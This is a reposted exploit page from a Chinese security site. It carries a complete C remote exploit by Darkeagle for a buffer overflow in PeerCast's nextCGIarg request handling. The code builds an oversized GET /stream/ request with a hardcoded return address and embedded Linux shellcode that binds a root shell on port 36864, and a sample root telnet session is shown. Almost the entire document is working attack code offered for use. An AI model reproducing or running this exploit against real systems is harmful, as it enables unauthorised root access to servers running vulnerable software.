首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PeerCast nextCGIarg Function Request Handling Remote Buffer Overflow Exploit #2
来源:http://unl0ck.net 作者:Darkeagle 发布时间:2006-03-13  

PeerCast "nextCGIarg" Function Request Handling Remote Buffer Overflow Exploit #2


/*
\ PeerCast <=0.1216 remote exploit
/ by Darkeagle
\
/ 09.03.06
\
/
\ gr33tz: bl4ck guys, unl0ck guys, rst/ghc guys, 0x557 guys, ph4nt0m guys, sh0k and many otherz.
/
\
/ http://unl0ck.net

*******************************************
root@localhost darkeagle]# telnet localhost 36864
Trying 127.0.0.1...
Connected to localhost (127.0.0.1).
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root)
: command not found
uname -a;
Linux localhost 2.6.3-7mdk #1 Wed Mar 17 15:56:42 CET 2004 i686 unknown unknown GNU/Linux
: command not found
*******************************************

Special tnx goes to: Dr_UF0 for targets support :)

\
/
\
*/

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>


char scode[]= // binds 4444 port
"\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
"\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\xd6\x25\xc8\xb5"
"\xe3\x17\x53\x56\x64\x82\x4a\x49\xc6\x1d\xac\xb7\x94\x13\xac\x8c"
"\x0c\xae\xa0\xb9\xdd\x1f\x9b\x89\x0c\xae\x07\x5f\x35\x29\x1b\x3c"
"\x48\xcf\x98\x8d\xd3\x0c\x43\x3e\x35\x29\x07\x5f\x16\x25\xc8\x86"
"\x35\x70\x07\x5f\xcc\x36\x33\x6f\x8e\x1d\xa2\xf0\xaa\x3c\xa2\xb7"
"\xaa\x2d\xa3\xb1\x0c\xac\x98\x8c\x0c\xae\x07\x5f";

char linuxshellcode[]= // binds 36864 port
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
"\x40\x89\xc3\x89\x46\x0c\x40\x89"
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
"\x80\x43\xc6\x46\x10\x10\x88\x46"
"\x08\x31\xc0\x31\xd2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e"
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43"
"\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
"\x80\x88\x56\x07\x89\x76\x0c\x87"
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
"\xe8\x8d\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68";

void usage(char *proga)
{
printf("usage> %s <ipaddr> <port>\n", proga);
}

int main( int argc, char *argv[] )
{
int sock;
struct sockaddr_in addr;
char evil[1024], get[1024];

long retaddr = 0x438a3e3c; // mandrake 10.0 rus - peercast 0.1211.tgz


system("clear");
printf(".::: PeerCast <= 0.1215 remote exploit :::.\n");
printf(" by Darkeagle \n\n");
printf(" bug founder: Leon Juranic\n");
printf("\n keep private!!!\n");

if ( argc < 3 )
{
usage(argv[0]);
exit(0);
}

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[2]));
addr.sin_addr.s_addr = inet_addr(argv[1]);

printf("\nexp> connecting...\n");

if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) != 0 )
{
printf("exp> connection failed\n");
exit(0);
}

printf("exp> connection enstabilished!\n");

memset(evil, 0x00, 1024);
memset(get, 0x00, 1024);
memset(evil, 0x55, 800);
//memcpy(evil+strlen(evil), &scode, sizeof(scode));
memcpy(evil+strlen(evil), &linuxshellcode, sizeof(linuxshellcode));

strcpy(get, "GET /stream/?");

*(long*)&evil[780] = retaddr;
strcat(evil, "\r\n\r\n");
strcat(get, evil);

sleep(1);
printf("exp> sending evil data\n");
send(sock, get, strlen(get), 0);
printf("exp> done!\n");
printf("exp> check shell\n");
close(sock);
return 0;
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PeerCast nextCGIarg Function R
·Apple OSX Mail.app RFC1740 Rea
·Dvbbs 7.1 boke.asp SQL Injecti
·Microsoft Windows Telephony Se
·Denial of Service exploit for
·KnowledgebasePublisher 1.2 Rem
·Norton AntiVirus Crasher Explo
·MyBB version 1.04 and prior SQ
·WordPress DoS Exploit
·Mercur IMAPD Buffer Overflow (
·RevilloC Mail Server USER Buff
·A vulnerability in HT 9.1 Expl
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved